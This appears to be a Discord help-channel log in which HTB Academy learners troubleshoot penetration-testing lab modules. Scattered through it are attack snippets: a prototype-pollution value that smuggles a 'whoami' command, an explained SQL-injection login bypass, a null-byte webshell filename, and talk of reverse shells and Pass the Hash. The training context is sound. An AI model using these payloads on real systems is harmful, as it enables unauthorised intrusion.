#modules
hello can i have moderator or administrator help i have a discord issue with identifying me
yall have a problem spawning targets or is it just me?
I can spawn but im getting this
smbclient -L 10.129.142.193 -U htb-student
do_connect: Connection to 10.129.142.193 failed (Error NT_STATUS_IO_TIMEOUT)
when i try to connect via smb client from Linux
its pretty infuriating TBH
yeah me too, i can spawn it but connection error
I've wasted more time figuring out how to connect, if I am connected and why can't I connect than actually using the platform
hi I tried to get this section working for the ICMP Tunneling with SOCKS section of Pivoting Tunneling and Port Forwarding Module. I tried to resolve this error yesterday in chatgpt and what it said didn't work. I am able to log into pivot host but here's what I get when I try to run the tool it tells me to run on pivot host:
ubuntu@WEB01:~/ptunnel-ng/src$ sudo ./ptunnel-ng -r10.129.202.64 -R22
[sudo] password for ubuntu:
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.36' not found (required by ./ptunnel-ng)
./ptunnel-ng: /lib/x86_64-linux-gnu/libc.so.6: version `GLIBC_2.34' not found (required by ./ptunnel-ng)
Do I need to make it into an executable on attack box and then transfer?
or do I need an older version of ptunnel-ng?
It’s shellcode
Hey guys
Are there any professional cyber security here if yes I just want to get the advice on how they're joining was in learning cyber security
Cuz I'm kind of very confused
Just telling me how does parents was
Yes an older version will probably run.
ok
how do I know which version to download?
Information on all packages for project ptunnel-ng
I could shoot in the dark but they all look like a recent version
the kali rolling one isn't the one I'm looking for because its the one I already tried first
so should I get the ubuntu one?
this is for the ICMP Tunneling with SOCKS section of Pivoting, Tunneling, and Port Forwarding
do you have a recommended version or do I just do any old version?
if its too old won't it be outdated?
wait I think I am about to get it to work
Hi
ok it didn't work
really strange so I ran the ncat command again and was given the flag, but now I am wondering why it was not working originally! and also why it can only work on the pwnbox and not on my kali VM
don't reveal direct answers/solutions to modules
hi on pwnbox its working better but there are still issues with the tool I'm using on the pivot host. this is for ICMP Tunneling with SOCKS section of Pivoting, Tunneling, and Port Forwarding
in my VM it won't work but I get closer with Pwnbox
I have a screenshot of where I'm at now but I'm 100% confident if I post it will be spoiler
wait nope it doesn't work on pwnbox
sorry, I didnt know that was the answer because it was not working for me originally hence why i asked for help 🙂
Hello, how can I contact a moderator or admin on Discord?
Why?
Issue with identify on the Discord
You can create it using c and assemble or use something like msfvenom to generate it for you
Theres a lot online
Use the static build method shown in the section.
Hi Mr.Robyn good to see you here
good I just completed the section
it worked I finished the section thanks
I lost my progress, I login today and my account progress was reset
Hi, please contact support
Need to speak to a person? Learn how to reach our support via HTB Labs.
You can DM me
Hi all QQ, just completed the Introduction to Web Applications, at the end of the module it stated: Finally, to apply what we learned from these modules, we can jump into attacking some Easy boxes on HackTheBox. However when I click the HackTheBox button, it just sends me to my account, so where do i find the machines related to Web Applications? Thanks in advance.
congratulations
I'm surprised that module says that tbh. Most of the boxes, even easy ones, are going to have things out of scope of the exam. That said, when you click "finish" on the module it takes you to a page with recommendations on the lower right if you scroll down, there's a list of boxes there.
Thank you
footprinting Ipmi i have the hash but i'm getting a token length exception: 1/1 hashes. i don't understand whats wrong, did i capture the token incorrectly?
hello friends
in Footprinting - Oracle TNS
https://academy.hackthebox.com/module/112/section/2117
when executing the bash script, it doesn't work. any suggestions?
you gotta read that one, you have to install it
yes, the script is for the install but it doesn't work
iirc you need to supply the --user command since the hash you receive is user:pass in the hash
the bash script frequently breaks, it's best to run each command one at a time
also "it doesn't work" isn't really descriptive of the issue, "it doesn't work" can mean a multitude of things without a meaningful error to help pinpoint your problem
ty ty....it says it's gonna take 3 days....uhhh i think i goofed?
expected != actual
but also
it sounds like you supplied the mask instead of just using the hash itself
if you read the section carefully it tells you that the mask is for specific situations. otherwise you should be using a wordlist
is that list found in msf console or the resources button in the module?
resource button
msfconsole has a default wordlist it tries when it captures the hash, but i don't recommend changing that when you run the command -- it's a small list for a reason
you sure? thats the same word list from SMTP module
you mean the smtp section
the wordlist is the same for the whole module
the "resources" button doesn't change per section
ah
it encompasses the whole module itself;
if that wordlist doesn't work => rockyou.txt
how would i have known to look for that? or what clues would lead to that txt?
i was able to find the user and login of a person in the oracle tns module in Footprinting, but i'm not able to get sqlplus to work saying it's not installed. what's the package for it?
you must have missed something because i had to go through that entire setup line by line
hm ok
Anyone know if there are any vouchers for annual subscription?
it's the typical "fuck you i'm out of options" wordlist, though i'm sure rockyou may have been mentioned at some point either in this module or a previous one
no
unless you mean does the annual sub come with an exam voucher => yes
but there's no voucher for the annual sub itself
Noted, thanks
mark; i beg you to look at the exam page for any of the exams
ok
Is it normal for machines to be slow
did you change the region for a better ping?
it doesn't say how long the exam certifies for on page
check the "Certification Steps page"
it depends; but if you're having issues -- use TCP vpn, or change vpn regions
oh wait I stand corrected
no expiration date it says. great. I thought they were lifetime certs so I guess I was right
yes; no expiration == lifetime
ok great
I'm psyched
I'm still working on CPTS
I'm getting through it much more quickly now than I was two months ago
I think I may finish in 6 months
or something I don't know. I think I am getting better mentally is part of it.
i had to break system packages thanks team
yep for python --break-system-packages is typically your friend
if it's not found with apt install python3-<packagename>
yeah i'm using my own vm instead of pwnbox so that was my issue
thanks for the help again friends
in future though, be more descriptive than "it's not working"
think of it this way; if someone asked you for help and just said "it's not working" with no other info; that'd be frustrating, no?
but if someone said "hey i'm getting an error when doing this, can someone help?"
(though the python error tells you exactly what to do iirc)
then it becomes a "oh this error just means you gotta pray to Cthulhu and the Machine Spirits"
gotta pray to john microsoft
John Microsoft won't help you with Linux
Praise the omnissiah
linustechtips torvald mb
Yo wsp guys I need your help
Attaching them to Sysreptor so that your notes and reporting are in the same place is a much better idea.
yeah I learnt to use that feature and wondered why I would bother
Hi guys, has anyone been able to solve or to point me in the right direction for RCE with Prototype Pollution (https://academy.hackthebox.com/module/205/section/2343) I am bypassing filter by not utilizing proto but rather constructor such as: {"constructor":{"prototype":{"deviceIP":"127.0.0.1; whoami"}}} but that doesn't seem to pollute the Global Object prototype for me in order to achieve RCE. Thank you for the help!
Are you still needing assistance?
I did it
Hello
A question regarding the Windows Privilege Escalation in the DnsAdmins section, after I became the member of "Domain Admins" group. I couldn't access the Administrator folder. But then I used psexec and with it. I can successfully access the folders. Why is that?
Note: I started the terminal as Admin, and I couldn't use psexec to login before adding my user into the domain admins group. So the steps I took to add user in domain admins did help, but not in that RDP session, why? the module didn't discuss anything about this so my curiosity kicks in (I do get the flag btw, just want to know why the former didn't work)
Group Membership is evaluated at the login, so in order to access (local) resources you need to login again to apply the changes.
Thanks a ton. Didn't know that.
Hey guys I am doing the bleeding edge Vulnerabilities section. While in petitpotam after retrieving the certificate I am not able to request tgt from that certificate using gettgtpkinit.py error is "KDC has no support for PADATA type (pre-authentication data)"
Even after restarting the DC using admin account the error remains same. Also launching new instance gives same error
Did you ever manage to get this answer?
they were not replying to your message
Ah got it, Sorry
Have you found the solution? The only thing I've got is a HEX response. But conversion to ASCII or UTF-8 is not accepted as the answer. Knowing that it is a SHA-1 hash. Thanks in advance!
Hey guys
Same question, does anyone have hints?
hello, im stuck at a question in penetration "what is the name of the theme used by wordpress on this target" i used the proper tool (wpscan) but the theme could not be detected
Hey can anyone help me out with Pass the Hash in password attacks for the last question
Pls dm 🙌
Anyone finished the file uploads skill assessment? I'm super close but think i need a nudge. ||I've gotten around the extension and content filters, leaked source code. I'm uploading files, found the upload directory, identified naming convention for the files but when i try to access the file.... 404 not found ||
nevermind. of course not even 5 minutes after i send this message i figure it out
every time
Write here on which questions you got stuck and I'll help you.
Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt.
Write down from which module/section the question is.
You can just read it via dir command as with prev question
Will try that soon, afk rn
Web Proxies
proxying tools
Try running 'auxiliary/scanner/http/http_put' in Metasploit on any website, while routing the traffic through Burp. Once you view the requests sent, what is the last line in the request?
stuck on this
Hey can you help me choosing an ip address of any website? seems like metasploit wont let me put one in
put hackthebox.eu into RHOST and set proxy properly (127.0.0.1 : 8080)
Proxy is set on burpsuite to 127.0.0.1 and port, burpsuite has it already on default but it seems like it doesn't give the request
Is anyone free to help explain/show “Web Requests” using Burp/Zap to me please? Some certain things I just don’t understand
Can take a look as soon as i get the task im doing correct
because im planning to do that next as soon as i get help with this one
figured it out, because i didnt input the proxy properly
I'm struggling with getting a reverse shell when using JuicyPotato. The priv esc. works fine, but no matter what I see to do, I can't catch a shell. I tested the script making the call and it works fine when I run it without JuicyPotato. Anybody can help? This is for the Win Priv Esc. Skill Assessment Part I
Did you ever get it working? I'm running into the exact same issue
how do I submit a correction in a module
thanks
just pointing out, if you're using a newer version of ldapsearch the -h will display the help menu and not work correctly. just have to add a note in case someone is using newer client the command would be ldapsearch -H ldap://172.16.5.5 -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(objectClass=*)" | grep -m 1 -B 10 pwdHistoryLength
It would be best as to make it a walkthrough error rather than a targeterror. But that's fine
Is there a gap between the ! And ' in the pass?
nope
Try it without the password, does it attempt to connect?
Oh thanks guys, I figured it out, the session has already given me another way if xfreerdp is not usable
Thanks alot
Ah ok, I remember that one
you're serving on port 8000 but trying to connect to 8080
Is there any chance this Practical DF will be fixed? trying to collect the memory via velociraptor unfortunately not working due to possible not able to get the winpmem to github
i have solved this after some minutes.
any support can assist me with this issue?
Hey if anyone can help im working on the Introduction to Networking module and i am pretty sure i got the right answer but it keeps telling me im wrong but im unsure if im formatting the answer wrong or misunderstanding what the questions is actually asking for
DM me with the info on which section/question you got stuck.
why does the terminal lag so awfully on target machine? VPN connection issue or what?
its VM lab itself not the VPN
Is it usually better? I cannot do anything at all in HTB Academy like that
Windows Attacks & Defense i cant connect target host
any errors or anything?
it is normal that the hosts of Attacking Enterprise Networks die while im doing pivoting with ligolo?
i mean, it is because the maintenance of CPTS cert?
false alarm, i think that the problem is with ligolo
the CPTS maintenance would have 0 bearing on module content
also the maintenance window isn't starting until the 18th
No one knows what will really be changed
@coral wraith Please don't spoil content, especially flags, from modules above tier 0
there is nothing to spoil since it's not working
You posted a flag
Hi Guys
I am trying to authenticate to sql and getting such a picture
mysql -u root -h 94.237.57.47 -P 56268 -p
Enter password:
ERROR 2026 (HY000): TLS/SSL error: SSL is required, but the server does not support it
Yes but this flag does not work and also in the task stands that you need the cookies to go to the admin login to get the flag but this is not working. I only get these cookies
Could be a flag for something else then. Just post your question without posting content from modules above tier 0 especially flags and you're fine.
OK but can you now help me solve it? Hint?
can't help right now sorry, just post your question and someone will likely get to you
Error says username or pass is incorrect, check your $SecPassword value, and please don't post content from modules above tier 0.
The password value that I set myself or discovered? I'm following the lab and I used a different password with mixed characters and get the same issue.
idk but i saw your $secpassword was set to '<PASSWORD HERE>' which doesn't seem like a password to me
I'm still researching and digging to see what I can find
sorry been a while since I last posted, where do we put module feedback?
#1234357888114364508 is probably the best place
ok thanks
I went down the steps again. I get both a user name or password error as well as an Unable to find user after running the "Set-DomainUserPassword" command to identify the damindsen password
AH! I Figured it out. Many thanks for the assist @cloud urchin
Is it just me or is there something wrong with the academy right now? Im in the process of doing the footprinting module, and the cube rewards for answering a question are set to 0(displayed).
Not every question from module sections offer cubes for completion. You will likely see them made up for later with harder sections or in the skills assessment at the end. Caught me by surprise during a module but they were there in the skills assessment.
Oh alright. Was just curious cause literally every answer is displayed with a "0" as the cube amount. Additionally, the skills assessment seems to reward a single cube for completion(?) At least thats how it is showing on my screen.
Not sure what displays on my end, but can check it out when I get home. If you decide to go through the sections you could tally it up and compare it against with what the module says you should earn. If there's a discrepancy on your end contact support.
Not all questions provide cubes when answered
Alright, I'll do so.
The problem is that, in my case, all the questions seem to reward 0 cubes
Try CTRL+SHIFT+R to hard refresh your cache, if you feel there's something wrong you can reach out to support on the site. I'm looking at the Footprinting Lab Hard skill assessment and it shows +1 for answering the question.
Ok I'll check it out again rn. Thanks
Now it all adds up. Everything's working fine and well.
Hello !
In the Attacking Common Services module, I am doing the FTP part. I started this morning, did the nmap, found the FTP port.
I had to go do something and am now back. I spawn a new target, which does not have the FTP port open (port that I identified this morning). I relaunched multiple times the target machine but still the nmap scan indicates that the port is closed.
How can I fix that ?
Hey guys, finding a few issues with the guides for some of the assessments
there are some dead links etc and parts where the answer box doesn't accept the answer that you put in despite the fact that the guide says it is in fact the answer, this is present on the "attacking web applications with Ffuf module" assessment and the dead links are on the Login Brute Forcing module. The 2023_200-most-used-passwords file does not seem to be present from the given command you just get a 404
That wordlist is part of seclists, if you don't have it (likely comes with your attacker machine) you can git clone the seclists and get it
the 2020_200 word list is there but not the 2023 unfortunately
Hi can someone please help me with the File Uploads Skills Assessment? I'm terribly stuck. I've already looked at the source code for upload.php, know what file extensions work, and know how files are renamed and what directory they go to. Every time I upload a file and go to it though it won't give me RCE. Any help would be greatly appreciated, been at this all day.
Nvm figured it out.
Anyone else had issues with PKINIT on the AD Trusts module Skill Assessment ?
Looking for a solution other than cycling VPNs and instances ...
Hi. I'm having trouble with the Password Attacks module Pass the Hash section. In the last task, which asks for C:\julio\flag.txt, I can't get a shell back. My reverse shell command executes successfully, but the shell doesn't connect. Can someone please check whether it works or if I'm doing something wrong?
According to my notes, I eventually got it to work via Kali after 3 resets of the env.
I did not switch VPNs. I just gave the env more time to spin up, meaning I would spin up the env and give it about 10 minutes just in case.
From both Linux and Windows attack paths?
Pwn box or your own VM?
The only other thing would be to try it from pwnbox.
You can DM to discuss this.
hi I cannot connect to the pivot server on HTB Academy's RDP and Socks Tunneling with SOCKS over RDP section on the Pivoting, Tunneling and Port Forwarding module from my VM. I can connect from my Ubuntu host, which I named Windows, but it disconnects very quickly unless I run xfreeRDP as root. But when I run it as root and try copying the two files it tells me to copy to RDP pivot server it won't copy the file over.
Can someone help me out?
I will try deleting tun1 or whatever from kali interfaces but will that work better than on Ubuntu?
Anyone available to help with what is likely a silly question on a beginning module?
I'm running through Pentest in a Nutshell, in the Windows System Enumeration section. I'm not able to get the information required out of winPEAS for the exact OS version - it's showing "+ FullyQualifiedErrorId : NativeCommandFailed" as an error, and I'm not sure how to get around that since I don't think the module is at privesc yet. I reckon I'm doing something just... blatantly wrong.
Hi, Can anyone help with the Windows Evasion SA 2? I have made reverse shell and copy file VBS scripts that work on dev machine but shows timeout in logs
anyway I only have one tun interface on kali so I know that's not the problem
kali won't connect even after upgrade/update
and one of the files won't move over
to RDP server either way
pwnbox isn't working
because too many people using the pwnbox
I had mixed results. Went for another last try just to refresh the knowledge before doing some “assessment” and it pretty much wouldn’t budge even after an hour.
I have, in other situations, used the DA’s hash to verify if the CA’s root cert was still valid, which it was. So I couldn’t figure why the issue persisted.
Yeah i actually went through it again last night and when it didn't work I just called it good. Not sure what's up with that one.
working on 'Web Attacks' -> 'Advanced File Disclosure' I'm attempting 'data exfiltration with CDATA'. I've got the file hosted on my computer, I've got the request modified with my external entity information. I know the target machine is reaching out to my computer to get the malicious file, however when the server receives the malicious request, it doesn't return any data. Is this expected?
If setup correctly it should request the dtd file which returns your payload in the response
If its requesting it from your webserver maybe theres an issue within it or after the remote entity triggers in your payload
@cloud urchin @waxen totem ok. thank you for the sanity check. I'll go back and double check everything
If its for the question at the end of that section though Im pretty sure there was another option if you cant recreate that option just yet
correct, there are 2 methods to exploit it, I just wanted to verify that what I was experiencing was a 'me' thing, not a technical thing. I'm going to try the other method here in a bit.
Thanks again.
Hi guys, a random question, was going through windows fundamentals, it looks like much more than fundamentals, do we need to know every single thing from it to go for cpts pathway or just skim through those modules
Windows Fundamentals is not part of the CPTS path. You don't need to complete it at all. If you're not familiar with Windows fundamentals you may want to study it though.
Its a part of pre security fundamentals
Which is a prerequisite for cpts
The only prerequisite for CPTS is completing the path before you can attempt the exam.
The thing is, despite CPTS being a "beginner" certification, a beginner in hacking doesn't mean a beginner in IT in general. You need strong foundational knowledge. If you don't have that the fundamental modules can help.
Htb says that prerequisite knowledge for cpts pathway is for us to know pre security fundamentals pathway
Oh
The only thing that gatekeeps you from attempting the exam are the modules in the CPTS path. Once you complete those modules, it unlocks your ability to take the exam.
Ok, well I don’t have that strong of foundation in IT so I had to take that fundamentals pathway
If a person who jumped into the CPTS path had zero computer knowledge they're going to struggle pretty hard compared to someone who already has strong foundational knowledge, that's where the pre-security fundamentals come in, to bridge that gap.
everyone in general recommends to do that before cpts and this is really not so easy pathway, only being a pre requisite pathway, i wonder how will be the cpts pathway
Yeah just because it's "fundamental" doesn't mean it's easy. HTB also presents it in such a way that challenges you, and even if you know a lot about fundamentals if you take the fundamental modules you're still very likely to learn things you did not know before.
Sounds like you would benefit from going through the fundamentals path
I was able to get through the privilege escalation section, but even after running powershell as admin or even changing the admin password and using runas, I still couldn't get systeminfo to run (Access Denied). I've gotta be too far down the rabbit hole, but not sure where I messed up.
Hi. For the Active Directory Enumeration & Attacks Privileged Access, where do I find the neo4j URL to log in the Neo4j database?
Does the module call to log into neo4j and use it directly?
doesn't it just have you use bloodhound?
neo4j runs a webserver on the localhost you can usually navigate there in a web browser i think the default port is 7474 iirc
It suggests it is easier to use the GUI. I bring up the login page, but it says there's no database at the auto-populated address
are you using neo4j for the first time?
Yes, I am.
ok, when you launch neo4j you log in with the default creds and it makes you change the password. you log in to your localhost:7474 in your web browser. with the creds you change you can log into bloodhound with those same creds. neo4j handles the database while bloodhound connects to that db with the user:pass then visualizes attack paths for you.
after you upload the data ofc.
Sorry I might sound stupid, but can y’all help me start with cybersecurity I know the basics of os, networking, what do I do now?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Curious what the differences are between ntlmrelayx.py --adcs and certipy relay. They seem to do the exact same thing.
while going through the setting up module I came across a couple of typos in the newer sections, can i report these anywhere or is here fine?
@grizzled niche you can dm me
Hello guys. in the Linux Services & Internals Enumeration Section, I found the python3 version but the flag is incorrect. does anyone know?
the question is What is the latest Python version that is installed on the target?
but I couldn't submit it
thanks for the offer, did some more trying, thought I'd tried everything, guess I didn't 
ended up getting it working!
I did it with mimikatz your command there looked correct
yup that ended up working, the next step was hiding in plain sight i was overthinking things!
working on introduction to web application, trying to find the exposed credentials, can't seem to find it, any guide
which module and section specifically?
sensitive data exposure
Have you tried: literally just following the techniques shown in the section?
yes I have
aight, so what have you tried so far?
I have gone through the source code and the js script
are you sure you've thoroughly checked the source code? maybe look at the comments?
there are few comments but nothing is in there
you sure? copy paste the comments here
<!-- Google Tag Manager --> <!-- End Google Tag Manager --> !-- Google Tag Manager (noscript) -->
you sure you on the right site?
are you sure other versions aren't installed?
also what's the module name?
nvm it's the linux privesc
yeah do more enumeration to discover the information
Hi everyone, have anyone just finished the module "Login Brute Forcing"? I am stuck in section Custom Wordlists
I have got multiple credentials but none of them worked
found the answer, I was in the wrong site. thanks
yo guys
im still on password attacks
i remember asking a question in password attacks like 2 weeks ago lol
im on cracking ssh passphrase section
ive transferred the id_rsa
(encrypted transfer)
verified md5 hash matches
ran that exact command ssh2john.py SSH.private > ssh.hash
but at the end
i don't see any 'cracking ssh passphrase' section
└─$ john ssh.hash
No password hashes loaded (see FAQ)
sry i meant question
section name is protected files
you can dm me the command you're using
aiiiight
no feedback on the issue despite support contact and now the thread is locked in #1234357888114364508 , what is going on with HTB Academy ??
I did but I don’t see still
There's multiple versions of python installed
Hey! anyone has problem with the nmap section in Proxying Tools (Using Web Proxy module)?, i ran the nmap scan but the burp didnt intercept the request, i did curl and metasploit and all got intercepted except nmap
currently doing Premature Session Population in HTTP Misconfigs module. Anybody managed to do the exercise ?
I think it's broken
I did, a while back but
Anybody managed to do Attacking Domain Trusts - Cross-Forest Trust Abuse - from Linux in the Academy Active Directory module ? Because I retrieve Users with an SPN. However when asking for a TGS the GetUserSPN script run forever without giving me an error.
Alright, I’ve been going through the File Transfers module, upon getting to the Linux File transfer methods.
When I attempt to SSH into the targeted machine it spawns from the pwnbox I get the error “Connection Reset by <target IP> port 22”
Nmap shows port 22 is open using the provided htb-student and pw. Is there something I’m missing I know all the steps I need to perform to upload and run a hasher as I’ve done it with previous jobs just will not let me SSH into the machine.
Steps I’ve tried
Reset Pwnbox
Reset target machine
Both with a terminate and reset
Changed Pwnbox location from US west to Us East and CA
Logged out and back in
Tried a different network for the possibility it was on my end
Been reinforcing skills for the CPTS as I took a 4 year mental health break on cyber security from burn out
SQL Injections. Been trying to login as Tom for a while now, anyone know what I'm doing wrong? I've tried just inputting "tom", no username or '1'='1 and without, almost exhausted my options
try a normal password and a payload in the username 😉
Thank you btw 🙂
mb didnt mean to leak that answer
Thanks so much, both ways work 😮
I urge you to figure out the logic chain or order of operations that the final query does so you can understand the reason why it works
I'm gonna go back into the readings and hope I understand more ofc 🙂 thanks so much
Here's a hint to the logic behind it: it also works with 1=2
That kinda confuses me more lol
If tom is true, and 1 = 4 is false, how tf am I logging in
Think of it this way, the AND evaluates before the OR so what you get is:
WHERE USERNAME='tom' OR ('1'='2' AND PASSWORD = 'p')
WHERE USERNAME='tom' OR FALSE
WHERE USERNAME='tom'
Ohhh lol, that is very helpful for sure. So tom' is the user part, anything after belongs with the pass logic?
yep, but this will only work for that specific query, there's plenty of other query structures that that payload won't work for
I guess I still don't get how both pws can be false, but still successful log?
('1'=2 AND pass = 'notPass')
So '1'='2' isn't another password it's essentially the bypass to the password. Think of it this way,
The usual login:
login where username = Tom and Password = tom's password
The injection login:
login where the username = Tom OR don't login if Tom doesn't exist
Okay that makes sense, in a way it just sounds so crazy to think that works yk lol
I really appreciate it ❤️ that was so helpful lol. 65% cpts and it's been a burnout a bit lol, sometimes the content gets past my brain
Alright I’m about to Complete my CPTS path and in Windows Privilege Escalation subtopic SeTakeOwnershipPrivilege we were told to abuse the token to read content of flag.txt, although when we login first as HTB-student with its password and see whoami /priv I can’t see SeTakeOwnershipPrivilege token
hey i just started "network enumeration with nmap" and i dont find any option to start my target machine.
Spawn target
where is that button. sorry but i cant find any
If you can see it closely you can see some small boxes which means they are having targets within themselves
host discovery doesnt have that button i guess. could you please check
Yes those boxes means their subtopic will have questions to be answered and if you can see host and port scanning topic you’ll get the spawn target
Any mod who can reply me with this would be very helpful
the next module taught way better on logic + syntax. spent a good 40 mins really figuring it out but so worth it now, thanks for your help earlier!
Good afternoon guys someone had completed the module AI? I need a little help
Which one? There are 4 of those
Hey, Are the htb machines down?
AI applications of Ai in infosec 🙂
Use the example in the module
There’s also a repo of similar cases in the web
Example i don't understand bro
AI can also help you resolving the issues
It’s trying to open the file but there isn’t none.
Iirc the code should be executed in steps.
Also, make sure that any of the necessary files in the SA are in the directory
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
ZAP Fuzzer
Using web proxies
i got the cookie, I fuzzed with the top username list, but I got no flag found
Hi how do I need to add the IP address to etc/hosts in the Attacking Web Applications with ffuf module? With port? IP:PORT?
LLMNR/NBT-NS Poisoning - from Linux, am i supposed to get on openVPN then ssh to the target? because ssh just times out even though i can ping it.
i have the same problem oh my got 😦
The file that your script should access is missing
Is the path correct? I haven't worked through the module, but Python says it can't find the file
Yes, but is the file in the right place? Python cannot find the file
It's not about finding flags, it's about understanding the content correctly 😉
Hey guys! A question regarding metasploit. Do I set the SRVHOST also as the VPN ip address like the LHOST? It was by default 0.0.0.0 on msfconsole
No idea what you're using so it's hard to say. Based off the name "SRVHOST", to me, it sounds like server host so probably 0.0.0.0 is fine.
i know still i'm noob sorry xD
Not knowing something is not a problem. That's why you're at the Academy, to learn things
yes 🙂
can anyone give a hint regarding noSQL assessment 2 in the CWEE course? I have the username and a possible vector yet cannot trigger a valid response
Dm me
A session is an active connection between the attacker and target system. A job is a background task that runs in metasploit.
A job is simply a task, something that metasploit runs
i don't know every single job metasploit is capable of, but it's possible for it to have those things as jobs
a session is just a temporary interactive information exchange between a user and a system. like when you RDP into a box, that's an RDP session you have open with the target you're remoting into.
when you're sitting in front of your computer and you log into it, that's a session you have with your computer
a reverse shell establishes a session
I'm currently in the intermediate network traffic analysis module. the question ask to enter the username user through the TELNET protocol. I followed the TCL stream to locate the username and found "uname -a" but the answer was incorrect. Am I missing a step?
I still can’t figure it out. Thanks anyway
Best to also say which section you're on
How can i transfer mutated wordlist from password attacks to pwnbox ?
right-click
copy-link
wget <paste link>
also you don't transfer the mutated list, you generate the mutated list
the module gives you a username, password, and rules wordlists
Also is it possible to transfer from my host ?
uname -a is a linux command not a username
Explains it
doing the vuln assessment module. cant connect obviously. tried respawning 3x, no luck...
Is it supposed to be https?
now the 4th spawn is taking forever...
It usually is http, an easy test would be
curl http://<ip>:<port>
i will try when i get the ip....
Are you on the VPN? Are you using the pwnbox?
no
My bad, haven't done the section
ok good. see if you can ping the target it seems more like you can't reach it because that's the correct port
try ctrl+shift+r and then spawn it again
From 10.10.14.1 icmp_seq=6 Destination Host Unreachable
let me restart kali
same problem
destination host unreachable when pinging
the target ip
Hello!
Module: profile_images/readFlag.phar.jpg
Page: profile_images/readFlag.phar.jpg
In this exercise, I uploaded a file named shell.php\x00.gif containing a webshell payload. The server responds indicating the upload was successful. However, when I attempt to access URL/profile_images/shell.php, nothing loads.
My question is: does this mean the shell is never actually uploaded and the success message is intended to mislead, or am I simply looking in the wrong location?
I solved it another way, but I’m still scratching my head over why shell.php\x00.gif didn’t work.
Can someone throw me a lifeline before I start questioning reality?
Good afternoon! I'm doing the hard lab for the Password Attacks module. I've managed to get the administrator NTLM hash and ran hashcat against it. hashcat says it's cracked, but just gives me the NTLM hash (31*********0: <blank>)
has anyone run across that before?
I should say, i did double check that Administrator's password was not, in fact, blank. just in case.
nvm. i'm an idiot. that really is blank. so...somehow i didn't get all the hashes. le sigh
In that case, if anyone can tell me how i managed to get the hard part mounted, and the hashes are all blank i'd really appreciate that. that part took so long, i'm dreading having to redo it.
You can DM what you tried.
I follow the TCL stream and it's just a series of "...." I'm really not sure what I'm missing?
Agreed, I really like that feature. I just need to understand how to use Loot, though.
\x00 is a nullbyte; everything after is essentially ignored
Hello everyone, I'm having some trouble uploading my model (skills_assessment.joblib) for the AI Skills Assessment. Keeps telling me invalid model file. Any suggestions?
Thanks for the reply. I understand that is the reason I need to use the URL path of:
URL/profile_images/shell.php
but is not working. 😔
use a different payload to upload
nullbyte stuff is tricky and annoying, there's other methods that work just fine
Thanks!
You should check out Ippsec’s videos if you haven’t. A null byte is a relatively common thing to see in attacks
Also, participate in other CTFs! Even if you don’t complete a single challenge, it gives you experience and you can read writeups of the challenges you looked at afterward
\x is prefix for hex, \x00 is hex 00 => null byte when used in programming and most applications
hex is written in pairs \x00 => \xFF giving a wide range
Also when dealing with hex in general keep in mind the endianness of the string. (don't worry it just refers to the order of the bytes)
for the IPMI footprinting....is it alright that i used john instead of hashcat? john i felt was easier and worked right away compared to hashcat where i had to feed it a different wordlist
Hi guys, I am on the Windows Fundamental modules on hackthebox academy, and I am not able to access windows powershell after using xfreerdp to log into the virtual windows machine. is there any way to get the powershell open
Looks like you just can't see the whole screen due to the resolution. Try using /dynamic-resolution with your xfreerdp command.
should be able to do windows key + r to open a run dialog box and blindly type in powershell to open powershell though
i tried the windows key + r but all it does is open up the windows on my laptop xD
but i will try out the dynamic resolution method, thanks
update: it worked, thanks alot!
I'm working on Web Attacks -> Advanced File Disclosure. I'm attempting to use the technique discussed in the section "Advanced Exfiltration with CDATA" and I'm not able to trigger the bug. What can I provide to help diagnose this?
I think because when you upgrade metasploit in the future then all user-added exploits will be overridden by developer changes, so you will lose them if you add them directly to /usr/share/metasploit-framework/. You won't lose them if you keep them in .msf4
Good morning hackers
Hi guys, not sure if this has been posted again or is the correct channel, but I want to see if I am the only one. I am studying for the cdsa, but although the whole journey is amazing (things that already know starting to make sense in a deeper form) I am starting to "lose heart" for study. I am not a native speaker, so I am losing valuable time with translation, as many words that are being used are not so keen. I mean during the weekdays I hardly study two hours max cause all the time I have to translate stuff.. and I can say that most of the day I speak and write in English at work.
Guys, where to find pre-populated scan data for nessus skill assessment (Vuln assessment module)?
Click on report button on the top right corner
Essentially link order = order in which the GPOs are processed.
then wouldnt that mean GPO with the lowest link order is processed first?
Yep, you highlighted it 
but it says last
in the image
no such button, only reporting section
wut, what does your page look like
Yeah it's kinda confusing, just know that: The lower the number the higher the priority which means they overwrite the others
Ahh okie okie, thank you!!
1 is last but its settings are applied first
First in Last out as it were
could anyone give me a nudge for the parameter logic bugs skill assessment? i'm assuming its related to || coupon|| ? but i keep getting the error || invalid||. is it a rabbit hole?
you want me to send you scrshots in pm?
sure
Hi
Im doing attacking common services
"Other notable applications"
I found an unauthenticated RCE via GET request but when i execute commands i dont get any output
When i send a web request to my NC listener i do see headers in the terminal
However i cant get a Reverse shell
Any ideas?
so i'm trying to sign into the HTB academy but it thinks i'm a bot, and it wants me to submit a form that doesn't exist! what am i missing here??
Don’t expose ur credentials here
the email is public anyway
you are exposing the num of digits of your passwords as well
try turn off your vpn, or close all instances of your browser and try again it happened to me 2 days ago
correct, but its complexity is very high to the point i thought it is no use of brute forcing or something so didn't bother hiding it, but cautious is required 🙂
ok
Sorry wasn't identified and was redirected here without seeing it..you may delete the comment
No matter how good is ur password and stuff there are some skilled people out there just be safe 🌹
The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists.
not working
Can someone help me out?
i didn't see the issue, if you're trying to fuzz an application, and your list isn't including what you're looking for, then either the list is invalid in the parameter you are fuzzing and should try another list, or you are looking into an incorrect parameter.
which module is it
